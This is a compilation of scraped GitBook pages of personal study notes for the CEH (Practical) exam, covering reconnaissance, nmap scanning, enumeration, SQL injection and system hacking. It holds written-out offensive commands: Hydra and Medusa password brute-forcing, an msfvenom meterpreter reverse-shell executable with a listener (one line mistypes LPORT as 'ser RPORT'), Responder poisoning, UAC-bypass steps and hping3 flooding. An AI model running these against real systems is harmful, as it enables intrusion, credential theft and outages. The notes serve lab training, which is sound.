can't say words about this tool!🔥This is one of my fav tools for brute force passwords for services running on a network. Copy hydra -L /Path/To/Username/WordList -P /Path/To/Password/WordList 10.10.10.x ftp On Hydra, you can set your desired service to brute force, on the above command you can see I have set the brute force to FTP. Same as you can set for any service. Examples, SSH, RDP, SAMBA, etc... ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#medusa) Medusa Medusa is also one of the best tools out there for brute force. Even though I love Hydra, I use medusa alot. Maybe I can prioritize Medusa first and Hydra second place. [https://shehackske.medium.com/brute-force-password-cracking-with-medusa-b680b4f33d69shehackske.medium.com](https://shehackske.medium.com/brute-force-password-cracking-with-medusa-b680b4f33d69) This Medium has a comprehensive explanation on how tpo use medusa Copy medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#dvwa) DVWA ------------------------------------------------------------------------------------------------------------------------------------- **Damn Vulnerable Web Application (DVWA)** is a PHP/MySQL web application that is damn vulnerable. DVWA aims to practice some of the most common web vulnerabilities, with various levels of difficulty. DVWA plays one of the major roles in the C|EH (Practical) exam. It is advisable to crack DVWA and get used to the box since the challenges may appear based on the challenges available on this box. Hey! Thank you for being up here in my process. DVWA is one of the best applications for practising your web application attacks. Since I completed this challenge years before, I request you to work on this. I can't help you with each module in the DVWA but there are tons of video tutorials and blogs about this box. Please complete this box since this might be **important** for your exam. #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#i-have-attached-the-solution-playlist-of-dvwa-below-check-this-out) I have attached the solution Playlist of DVWA below 👇🏻 check this out [https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q](https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q) [https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q](https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q) #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#by-now-you-should-have-the-knowledge-on) By now, you should have the knowledge on: > * Command Injection > > * Local File Inclusion (LFI) > > * Crafting Payload using msfvenom > > * Gaining Reverse shell using netcat or metasploit > > * SQL Injection > > * XSS > > * CSRF > > * Bruteforce > [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#wordlist) Wordlist --------------------------------------------------------------------------------------------------------------------------------------------- For **Certified Ethical Hacker (Practical)** exam, You don't need to worry about the wordlist since most probably they would have attached the wordlist for each module so make use of those first. If you have any failures then go with the default wordlist. [PreviousSQL Injection](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection) [NextCloud Computing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing) Last updated 4 years ago This site uses cookies to deliver its service and to analyze traffic. By browsing this site, you accept the [privacy policy](https://policies.gitbook.com/privacy/cookies) . AcceptReject --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/about-the-author.md). # About the Author ## Introduction About Me Hey There!👋🏻 I'm \[\*\*Guru HariHaraun.\*\*\](https://thegurusec.com) Information Security Professional Student and Certified Ethical Hacker with 3+ years of research experience in Penetration Testing(Red Team), withholding a Bachelor of Engineering degree focused in Computer Science. Also, I am a Cloud Engineering Aspirant, a Full-Stack Developer, and an SEO Strategist. ## About This Book This is my book where I share and document all my write-ups, which might help others in the information security community. As everyone knows, contributing to the community gives you knowledge and power! 🔥and I go it with all grant😎 ## Contact Me
PlatformLinks
Webhttps://thegurusec.com
Linkedinhttps://www.linkedin.com/in/guru-hariharaun
Mediumhttps://thegurusec.medium.com/
Githubhttps://github.com/guruhariharaun
Twitterhttps://twitter.com/thegurusec
Emailmail@thegurusec.com
## Support Me #### Hi Again! So I put much effort into doing work for these books since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁 {% embed url="" %} --- # Certified Ethical Hacker (C|EH)(Practical) | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical.md) . ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FfRxKHeGTbcuZFYTmOoyD%252FCEH-Practical-Logo.gif%3Falt%3Dmedia%26token%3De2a20500-7cbc-4820-841b-dac1de57e2a8&width=768&dpr=3&quality=100&sign=87840d16&sv=2) Logo of Certified Ethical Hacker (Practical) | C|EH (Practical) [](https://book.thegurusec.com/certifications#introduction) Introduction ----------------------------------------------------------------------------- **Hey there!👋🏻** Welcome to my notes If you are here then you are probably to pass your **Certified Ethical Hacker (Practical)** exam or to get to know about the exam. So this book guides you with all the tools, tricks procedures, notes. I used it in my preparation and during my exam. **Disclaimer:** You can't 100% relay this note for your exam preparation. Since I do have experience with penetration testing I might have skipped a few steps. I tried almost to add all the tools and steps in layman terms, so please get used to it and always google the stuff. Use these notes as your escape mechanism before your exam. All the tools which have mentioned in this guide may not be safe to use since some of the tools are not been maintained by the team. If any issues happen for you or for your computer, I'm not responsible. [](https://book.thegurusec.com/certifications#my-write-up) My Write-up --------------------------------------------------------------------------- You can read my blog on [**how I cracked CEH (Practical) with a full score on my first attempt****.**](https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac) Since I wrote a blog on Medium, I'm not duplicating all my content here on this page, also, it may affect the SEO rank of my website. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=4c6031fc&sv=2)How I passed CEH (Practical) in my first attempt by Guru HariHaraunMedium](https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac) [](https://book.thegurusec.com/certifications#page-of-content) Page of Content ----------------------------------------------------------------------------------- [Reconnaissance (Footprinting)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting) [Scanning Networks](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks) [Enumeration](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration) [Vulnerability Analysis](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis) [System Hacking](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking) [Steganography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography) [Sniffing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing) [SQL Injection](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection) [Hacking Web Applications & Servers](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers) [Cloud Computing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing) [Cryptography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography) [The Final Note](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note) [](https://book.thegurusec.com/certifications#showcase) Showcase --------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications#certificate) Certificate: ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252F9R5g2Wtbk22CwknJCgnx%252FECC-CEHPractical-Certificate.png%3Falt%3Dmedia%26token%3D0f85b185-a197-49a3-9d6e-295a362fbb95&width=768&dpr=3&quality=100&sign=4fe9288b&sv=2) Certificate of Achievement - **Certified Ethical Hacker (Practical)** ### [](https://book.thegurusec.com/certifications#digital-badge) Digital Badge You can verify my Digital Badge for authenticity here on the ASPEN portal. [Verify Badge | ASPENaspen.eccouncil.org](https://aspen.eccouncil.org/VerifyBadge?a=BBDTKAK7dcB7IqnCSdTJc3kMsy5qYBLPzNgp9mAL4mM%3D&type=certification) Digital Badge of Guru HariHaraun [](https://book.thegurusec.com/certifications#support-me) Support Me ------------------------------------------------------------------------- #### [](https://book.thegurusec.com/certifications#hi-again-so-i-put-much-effort-into-writing-certified-ethical-hacker-practical-notes-since-they-are-n) Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝 [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fcdn.buymeacoffee.com%2Fstatic%2Fprod%2F12.3.2%2Fbuild%2Fassets%2Fapple-icon-180x180-912350ec.png&width=20&dpr=3&quality=100&sign=6c0fd007&sv=2)Guru HariHaraunBuy Me a Coffee](https://www.buymeacoffee.com/guruhariharaun) Support me here by buying me a coffee 😁🥰 [PreviousAbout the Author](https://book.thegurusec.com/) [NextReconnaissance (Footprinting)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting) Last updated 4 years ago This site uses cookies to deliver its service and to analyze traffic. By browsing this site, you accept the [privacy policy](https://policies.gitbook.com/privacy/cookies) . AcceptReject --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting.md). # Reconnaissance (Footprinting) ## Information Gathering using Google Dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes i the configuration and computer code that websites are using. Google dorking could also be used for OSINT. {% embed url="" %} Exploit DB - Google Hacking Database {% endembed %} {% file src="/files/xaWiHDLtPJrhmryyQIFe" %} ## Netcraft and Peekyou \* to find the information about the websites \* \[www.peekyou.com\](http://www.peekyou.com) to find the information about people who live in the USA ## Harvesting Email using theHarvester theHarvester is a very simple to use, yet powerful and effective tool designed to be used in the early stages of a penetration test or red team engagement. Use it for open-source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet. The tool gathers emails, names, subdomains, IPs and URLs using multiple public data sources. {% embed url="" %} \`\`\` theharvester -d microsoft.com -l 200 -b baidu \`\`\` ## Sherlock \* Sherlock is a tool used to Gather information and hunts down social media accounts by username across social networks about the users. {% embed url="" %} \`\`\` python3 sherlock.py satoshi nakamoto \`\`\` ## Ping Ping is a computer network administration software utility used to test the reachability of a host on an Internet Protocol network. It is available for virtually all operating systems that have networking capability, including most embedded network administration software \`\`\` ping www.google.com -f -l 1500 -i 3 -f = Fragment the packets -l = Size of bytes -i = Number of packets \`\`\` {% hint style="info" %} The maximum size of the frame is \*\*1472\*\* {% endhint %} ## Web Data Extractor \* Web Data Extractor is a Windows Tool \* The tool is used to crawl website content like: \* Meta Tags \* Emails \* Phones \* Etc... {% embed url="" %} Official website of the tool {% endembed %} !\[\](/files/9tKPKY6npPlGYo37G3C0) ## HTTrack \* HTTrack is a tool used to mirror a website and use it in offline {% embed url="" %} ## Cwel \* Cwel is a tool used to create a wordlist from a specific website \`\`\` cewl -d -w save\_wordlist.txt 2 -m 5 www.example.com \`\`\` ## Email Tracker Pro \* Email Tracker Pro is used to track and check the Email Headers. {% embed url="" %} ## Whois Lookup using Domain Tools \* \[https://whois.domaintools.com\](https://whois.domaintools.com/) is a tool used to lookup the details of a particular domain. \* WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system but is also used for a wider range of other information. {% embed url="" %} ## DNS Footprinting ### nslookup \* nslookup is a network administration command-line tool for querying the Domain Name System to obtain the mapping between a domain name and IP address r other DNS records. !\[\](/files/NmNBPDBWCGTnDupJNlyD) ### DNSrecon \*\*DNSRecon\*\* is a free and open-source tool or script that is available on GitHub. Dnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language. You must have python language installed in your kali Linux operating system in order to use the script. \`\`\` dnsrecon -r 192.168.64.0-192.168.64.225 \`\`\` {% embed url="" %} ## TraceRoute \* Traceroute is used to find the path IP to reach the website. \* In computing, traceroute and tracert are computer network diagnostic commands for displaying possible routes and measuring transit delays of packets across an Internet Protocol network. ## Path Analyzer Pro \* Path Analyzer Pro is a tool used to track the Path and it is a GUI windows application {% embed url="" %} ## Other Tools \* Recon-ng \* Maltego \* OSRFramework \`\`\` OSRFramework Tools usufy.py -n Mark Zuckerberg -p twitter facebook youtube domainfy.py -n eccouncil -t all (Gather all the registered domains) searchfy.py (Gathers info of user on Social networking page) mailfy.py (Gathers info about email accounts) phonefy.py (Gathers the series of phones) \`\`\` \* FOCA (Best tool to footprint the whole Web server \*\*Must check\*\*) \* Billcypher is a tool used to track down --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note.md). # The Final Note ### Hey! Thank you for reading my notes. I hope this will be your only source of side support throughout your CEH (Practical) preparation. I strongly suggest you take your own notes so that you can personalize them. {% hint style="danger" %} Disclaimer: These notes are only for your personal preparation. I did it for mine, and I thought it might help others too. You can share this note anywhere, but if any issue arises, I'm not responsible for it. Also, some of the tools I've mentioned in the notes are not updated, handle them with your own response. {% endhint %} ## Support Me #### Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝 {% embed url="" %} Buy me a coffee here 😍😁 {% endembed %} ## I Need your Feedback #### At the bottom of the pages, you can find emojis. Please do rate it based on your preferences. It might help me to stay motivated as well. 😊 --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking.md). # System Hacking ## Introduction System hacking is defined as the \*\*compromise between computer systems and software to access the target computer and steal or misuse its sensitive information\*\*. The malware and the attacker identify and exploit the vulnerability of the computer system to gain unauthorized access. #### Steps involved in System Hacking 1. Gaining Access 2. Escalation Privileges 3. Maintaining Access 4. Clearing Logs ## NTLM Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity. {% embed url="" %} This Medium Post might give you an idea about NTLM Hashes {% endembed %} ### Responder Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer \*specific\* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: ). By default, the tool will only respond to File Server Service requests, which are for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix. {% embed url="" %} {% embed url="" %} This migh be useful! Give a read {% endembed %} \`\`\` chmod +x Responder.py sudo ./Responder.py -I eth0 Responder.py -I eth0 -dwrv \`\`\` ### Cracking NTLM Hash using John-The-Ripper John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It has a bunch of passwords in both raw and hashed format. Now to crack the password, John the Ripper \*\*will identify all potential passwords in\*\* a hashed format. {% embed url="" %} {% file src="/files/zXYY6k2pseXdH6AwFKCm" %} {% endfile %} {% embed url="" %} ## Backdoor Using Metasploit The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7. #### Crafting Windows executable through MSFVenom \`\`\` msfvenom -p windows/meterpreter/reverse\_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe \`\`\` #### Setting up reverse listener using msfconsole \`\`\` msfconsole -q use exploit/multi/handler set payload windows/meterpreter/reverse\_tcp set LHOST YOUR-IP-ADDRESS ser RPORT ANY-FREE-PORT exploit \`\`\` ## PowerSploit PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: {% embed url="" %} #### Must Read this tutorial {% embed url="" %} ## Armitage \*Armitage\* is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. !\[\](/files/46W04ktVpp8f79O4cgbA) ## Hacking Microsoft office with Macro {% embed url="" %} ## Privesc Windows Machine using BeRoot BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the \[pupy\](https://github.com/n1nj4sec/pupy/) project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. Its main goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found as a potential way to escalate our privilege. {% embed url="" %} #### Steps you can replicate 1. Upload the BeRoot.exe into the Machine through Reverse Shell 2. Interact to the win shell. 3. BeRoot.exe 4. Run post/windows/gather/smart\\\_hashdump 5. to get System prev to try to use "getsystem -t 1" If it responds negative then follow the next step 6. Let's try another exploit. "use exploit/windows/local/bypassuac\\\_fodhelper" and set the session into that exploit. 7. After exploit try to run "getuid" "getsystem -t 1" "getuid" 8. Run post/windows/gather/smart\\\_hashdump #### Other Methodology: {% embed url="" %} {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks.md). # Scanning Networks ## Host Discovery Host discovery is usually referred to as '\*\*Ping' scanning using a sonar\*\* analogy. The goal is to send a packet thru to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. ### Netdiscover Netdiscover is a discovery tool and is built into Kali Linux 2018.2. Currently in the 03-pre-beta7 version and written by Jaime Penalba, Netdiscover can reform reconnaissance and discovery on both wireless and switched networks using ARP requests. To launch Netdiscover, type netdiscover –h to view the usage options. Should you only type the netdiscover command by itself, Netdiscover will launch a default scan.) \`\`\` netdiscover -i (network interface name) (example: eth0 or tun0) netdiscover -i eth0 netdiscover -r 10.10.10.0/24 \`\`\` {% hint style="info" %} \*\*eth0\*\* may differ if you are on a VPN network. Mostly it would be \*\*tun0\*\* {% endhint %} \* This will help to get all available machines on the network. \* Always make a habit of saving the IP of the machines since we use themin a lot. ### Nmap We can also use nmap to discover hosts in a given IP subnet. \*\*Note:\*\* In the upcoming section, you will learn what the nmap is and its uses are. Please refer to the below section. \`\`\` nmap -sn 10.10.1.1-254 -vv -oA nmapHostsOutput • -sn -> Disable Port scanning • -vv -> verbose mode • -0A -> output the results in 3 types of format(nmap, gnmap, xml) \`\`\` ## Nmap ### Introduction to Nmap Nmap \*\*allows you to scan your network and discover not only everything connected to it\*\*, but also a wide variety of information about what's connected, what services each host is operating, and so on. It was created by Gordon Lyon. It supports a large number of scanning techniques, such as UDP, TCP connect (), TCP SYN (half-open), and FTP. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. ### Basic command \`\`\` nmap -p- -sC -sV -O -A -T4 -oA nmapOutputfile 10.10.X.X • -p- -> Scans all the ports from 0 to 65535 available on the IP • -sC -> Runs default scripts • -sV -> version enumeration or service version • -O -> OS enumeration • -A -> Enumerate all the stuff as much as it can • -T4 -> fast as time 4 (default is 3) • -oA -> store the output on 3 types of format(nmap, gnmap, xml) \`\`\` ### Cheatsheet for nmap This cheat sheet was prepared by . You can also check out the cheatsheet. I've attached the file below👇🏻 {% file src="/files/wKrtGnbMU8xALMMHnvSz" %} {% endfile %} #### Switches in nmap which you might need to know
SwitchDescription
-sAACK scan
-sFFIN scan
-sIIDLE scan
-sLDNS scan (list scan)
-sNNULL scan
-sOProtocol scan (tests which IP protocols respond)
-sPPing scan
-sRRPC scan
-sSSYN scan
-sTTCP connect scan
-sWWindow scan
-sXXMAS scan
-AOS detection, version detection, script scanning and traceroute
-PIICMP ping
-PoNo ping
-PSSYN ping
-PTTCP ping
-oAoutput the results in 3 types of format(nmap, gnmap, xml)
-oNNormal output
-oXXML output
-T0 through -T2Serial scans. T0 is slowest
-T3 through -T5Parallel scans. T3 is slowest
### Port specific NSE scripts Using NSE we can perform specific enumeration or exploitation on a host. \`\`\` ls /usr/share/nmap/scripts/ssh\* ls /usr/share/nmap/scripts/smb\* \`\`\` ### Bypassing Firewall
SwitchExampleDescription
-fnmap -f 10.10.10.10
-gnmap -g 80 10.10.10.10Port Manipulation
-mtunmap -mtu 8 10.10.10.10Crunching down Packets to 8 Byte
-D RNDnmap -D RND:10 10.10.10.10Perform Decoy Scan and Generates Random non-reserved IP
—data 0xdeadbeefnmap 10.10.10.10 --data 0xdeadbeef
Send the binary data 0's and 1's
--data-string "Ph34r my l33t skills"nmap 10.10.10.10 --data-string "Ph34r my l33t skills"
Send strings as payload
--data-length 5
nmap --data-length 5 10.10.10.10
--randomize-hostsnmap --randomize-hosts 10.10.10.10
send request to a IP from Random non-reserved IP
--badsumnmap --badsum 10.10.10.10Sends Bad or Bongus TCP/USP Checksum
## Zenmap Zenmap is the official \*\*Nmap Security Scanner GUI\*\*. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. {% embed url="" %} Official Zenmap link {% endembed %} {% hint style="info" %} \* \*\*I strongly recomend\*\* you to go with \[\*\*Zenmap\*\*\](#zenmap) for the exam point of view. \* When you started your exam, the first objective you have to do is that start \*\*Zenmap (GUI Version of Nmap)\*\* scan on your windows machine. \* The reason is that in \*\*Parrot OS\*\* you may find it hard to parse all the IPs because the \*\*green colour\*\* with the terminal might overwhelm you. Instead, the \[\*\*Zenmap GUI\*\*\](#zenmap) would be useful to find out the services, OS running on that IP with a cute User Interface. \* \*\*Trust me!💪🏻\*\* this would be the great life-changer of your exam. \* I know as a penetration tester working on the terminal is cool 😎 but in the heat of the moment, the browser-based VM would make you tense. {% endhint %} ## Angry IP Scanner \* Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has \[many other features\](https://angryip.org/about/). \* It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks, and government agencies. \* It runs on Linux, Windows, and Mac OS X, possibly supporting other platforms as well. !\[\](/files/FhTCe1hLNYAEZ4yQkNUn) {% embed url="" %} ## MegaPing \* MegaPing is the ultimate must-have toolkit that provides all essential utilities for Information System specialists, system administrators, IT solution providers or individuals. \* Mega Ping is also a port and service scanning tool which is for Windows. !\[https://www.softpedia.com/get/Network-Tools/Network-Monitoring/MegaPing.shtml\](/files/cjaShO5ddyv7R3doW94C) ## Hping3 \* hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. \* It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the Tcl language. \* Hping3 is a python based tool used to scan and flood(DOS) the particular IP. \`\`\` hping3 10.10.10.x --udp --random-source --data 500 hping3 -S 10.10.10.x -p 80 -c 5 (5 TCP packets sent) hping3 10.10.10.x --flood (PING OF DEATH! Flooding the IP with TCP Packets) \`\`\` {% hint style="success" %} Later in the upcoming modules you may read have chance to use \[\*\*Hping3\*\*\](#hping3). But for time being as per my suggestion, use \[\*\*ZenMap GUI\*\*\](#zenmap) to scan the IP range to get the information or if you are comfortable with CLI go for \[\*\*nmap\*\*.\](#nmap) {% endhint %} ## Operating System Discovery \* The Operating System(OS) discovery has \*\*two types\*\* they are: \* Active Banner Grabbing \* Passive Banner Grabbing \* By Banner Grabbing the TTL and TCP Window Size of respective IP, we can identify the Operating System that server runs on. Here are the list of Operating System.
Operating System (OS)Time To LiveTCP Window Size
Linux (Kernel 2.4 and 2.6)645840
Google Linux645720
FreeBSD6465535
OpenBSD6416384
Windows 95328192
Windows 200012816384
Windows XP12865535
Windows 98, Vista and 7 (Server 2008)1288192
iOS 12.4 (Cisco Routers)2554128
Solaris 72558760
AIX 4.36416384
!\[TTL of this IP is 128 so it might be Windows 98, Vista and 7 (Server 2008)\](/files/RF55iKGFTZ9YPkbIk1wZ) ### Nmap Script \`\`\` nmap --script smb-os-discovery.nse 10.10.10.x \`\`\` ## Metasploit > We can also scan our target using metasploit #### Init the Metasploit Framework and check the status of database \`\`\` msfdb init service postgresql start msfconsole db status \`\`\` #### Scanning using Nmap inside Metasploit \`\`\` nmap -Pn -sS -A -oX Test 10.10.10/24 db import Test hosts (Here you will now listed with the Details of the subnets) services or db\_services \`\`\` {% hint style="success" %} As per my whish i avoided the Nmap scan using Metasploit because it might looks process tedious \*\*as for me\*\* where using \[\*\*ZenMap GUI\*\*\](#zenmap) or even through \[\*\*Nmap CLI\*\*\](#nmap) are even much easier you can get the available machine's IP from the IP subnet through \[\*\*hostdiscover\*\*\](#host-discovery) command. {% endhint %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection.md). # SQL Injection ## Introduction SQL injection, also known as SQLI, is \*\*a common attack vector\*\* that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists, or private customer details. > \*\*What is SQL?\*\* > > SQL stands for \*\*Structured Query Language\*\*, which is a computer language for storing, manipulating, and retrieving data stored in a relational database. SQL is the standard language for Relational Database System. MS SQL Server uses T-SQL, Oracle uses PL/SQL, the MS Access version of SQL is called JET SQL (native format), etc. ## Basics \* You can learn SQL Injection basics from the given link below. {% embed url="" %} {% embed url="" %} ## SQL Injection Cheat Sheet {% embed url="" %} ## SQLMap \* sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. \* It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. {% embed url="" %} GitHub Repo of SQLMap {% endembed %} #### After gaining knowledge of SQLMap, you should need to know: \* \[ \] Enumeration of databases \* \[ \] Enumeration of Tables in a Database \* \[ \] Dump the data from the database \* \[ \] Spawning an OS Shell with SQLMap ## Damn Small SQLi Scanner \*\*Damn Small SQLi Scanner\*\* (DSSS) is a fully functional \[SQL injection\](https://en.wikipedia.org/wiki/SQL\_injection) vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration.md). # Enumeration ## Introduction Enumeration is defined as the \*\*process of extracting user names, machine names, network resources, shares, and services from a system\*\*. The gathered information is used to identify the vulnerabilities or weak points in system security and try to exploit them in the system gaining phase. Enumeration belongs to the first phase of Ethical Hacking, i.e., “Information Gathering”. This is a process where the attacker establishes an active connection with the victim and try to discover as many attack vectors as possible, which can be used to exploit the systems further. Enumeration can be used to gain information on \* Network shares \* SNMP data, if they are not secured properly \* IP tables \* Usernames of different systems \* Passwords policies lists Enumerations depend on the services that the systems offer. They can be − \* DNS enumeration \* NTP enumeration \* SNMP enumeration \* Linux/Windows enumeration \* SMB enumeration ## netBIOS NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network. As strictly an API, NetBIOS is not a networking protocol. There are different types of commands and tools to enumerate netBIOS. ### nbtstat \* Displays NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both the local computer and remote computers, and the NetBIOS name cache. \* This command also allows a refresh of the NetBIOS name cache and the names registered with Windows Internet Name Service (WINS). Used without parameters, this command displays Help information. \* This command is available only if the Internet Protocol (TCP/IP) protocol is installed as a component in the properties of a network adapter in Network Connections. {% tabs %} {% tab title="Display All the name" %} \* To display all the NETBIOS name tables of the Remote Windows Computer \`\`\` nbtstat -a 10.10.10.x \`\`\` {% endtab %} {% tab title="Display Name Cache" %} \* Display NETBIOS name cache of Windows Computer \`\`\` nbtstat -c 10.10.10.x \`\`\` {% endtab %} {% tab title="use" %} \* use the NETBIOS share on Windows Computer \`\`\` \`\`\` \`\`\` net use \`\`\` {% endtab %} {% endtabs %} {% embed url="" %} Official Microsoft Documentation on nbtstat {% endembed %}
CodeTypeMeaning
<1B>UNIQUEDomain master browser
<1C>UNIQUEDomain controller
<1D>GROUPMaster browser for subnet
<00>UNIQUEHostname
<00>GROUPDomain name
<03>UNIQUEService running on system
<20>UNIQUEServer service running
